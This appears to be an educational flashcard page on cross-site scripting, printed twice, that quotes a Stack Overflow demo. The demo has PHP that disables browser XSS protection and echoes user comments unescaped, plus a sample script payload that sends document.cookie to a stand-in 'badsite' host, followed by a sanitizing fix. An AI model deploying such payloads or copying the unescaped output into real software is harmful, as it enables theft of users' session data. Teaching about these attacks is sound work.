MemoryRefresh!

Security / Xss attack   Xss attack



Questions Answers 0%

Pages   0 from 91
Questions   0 from 142

Reset


* XSS Cross Site Scripting All applications that display input are at risk. This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping.
<!-- Browsers have some xss protection, we need to disable it for this test example --> <?php header('X-XSS-Protection:0'); ?> <!-- Logged user data in Cookie --> <script> function setCookie(c_name,value,exdays) { var exdate=new Date(); exdate.setDate(exdate.getDate() + exdays); var c_value = escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); document.cookie = c_name + "=" + c_value; } setCookie('username', 'john'); setCookie('email', 'john@yahoo.com'); // --- Look Here --- // </script> <!-- User submit malicious comment --> <form method="POST"> Add a comment: <textarea name="comment"> <script> document.location = "badsite/test.php?cookies="+ document.cookie; </script> </textarea> <input type="submit" name="btn_submit"/> </form> <!-- Submited comment is displayed --> <?php if (isset($_POST['btn_submit'])) { if (!empty($_POST['comment'])) { echo $_POST['comment']; // --- Look Here --- // // redirect to: badsite/test.php?cookies=username=john&email=john@yahoo.com // and expose logged user private data // Solution // --- Look Here --- // // echo filter_var($_POST['comment'], FILTER_SANITIZE_STRING); } } stackoverflow.com
1) What is an XSS attack?




2) What protection exists for XSS atacks?







* XSS Cross Site Scripting All applications that display input are at risk. This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping.
<!-- Browsers have some xss protection, we need to disable it for this test example --> <?php header('X-XSS-Protection:0'); ?> <!-- Logged user data in Cookie --> <script> function setCookie(c_name,value,exdays) { var exdate=new Date(); exdate.setDate(exdate.getDate() + exdays); var c_value = escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); document.cookie = c_name + "=" + c_value; } setCookie('username', 'john'); setCookie('email', 'john@yahoo.com'); // --- Look Here --- // </script> <!-- User submit malicious comment --> <form method="POST"> Add a comment: <textarea name="comment"> <script> document.location = "badsite/test.php?cookies="+ document.cookie; </script> </textarea> <input type="submit" name="btn_submit"/> </form> <!-- Submited comment is displayed --> <?php if (isset($_POST['btn_submit'])) { if (!empty($_POST['comment'])) { echo $_POST['comment']; // --- Look Here --- // // redirect to: badsite/test.php?cookies=username=john&email=john@yahoo.com // and expose logged user private data // Solution // --- Look Here --- // // echo filter_var($_POST['comment'], FILTER_SANITIZE_STRING); } } stackoverflow.com

References









Programming

Php
   
Regex
   
MySQL
   
Css
   
jQuery
   
Git
   


References